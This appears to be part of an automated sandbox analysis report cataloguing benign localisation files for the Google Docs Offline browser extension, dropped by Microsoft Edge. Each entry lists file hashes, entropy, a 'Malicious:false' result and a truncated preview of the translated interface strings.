                                                                                                                                                                                                                                                                                    MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                    SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                    SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                    SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2778
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                    MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                    SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                    SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                    SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1719
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                    MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                    SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                    SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                    SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):936
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                    MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                    SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                    SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                    SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3830
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                    MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                    SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                    SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                    SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1898
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                    MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                    SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                    SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                    SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):914
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                    MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                    SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                    SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                    SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):851
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                    MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                    SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                    SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                    SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):878
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                    MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                    SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                    SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                    SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2766
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                    MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                    SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                    SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                    SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):978
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                    MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                    SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                    SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                    SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):907
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                    MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                    SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                    SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                    SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):914
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                    MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                    SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                    SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                    SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):937
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                    MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                    SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                    SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                    SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                    Malicious:false
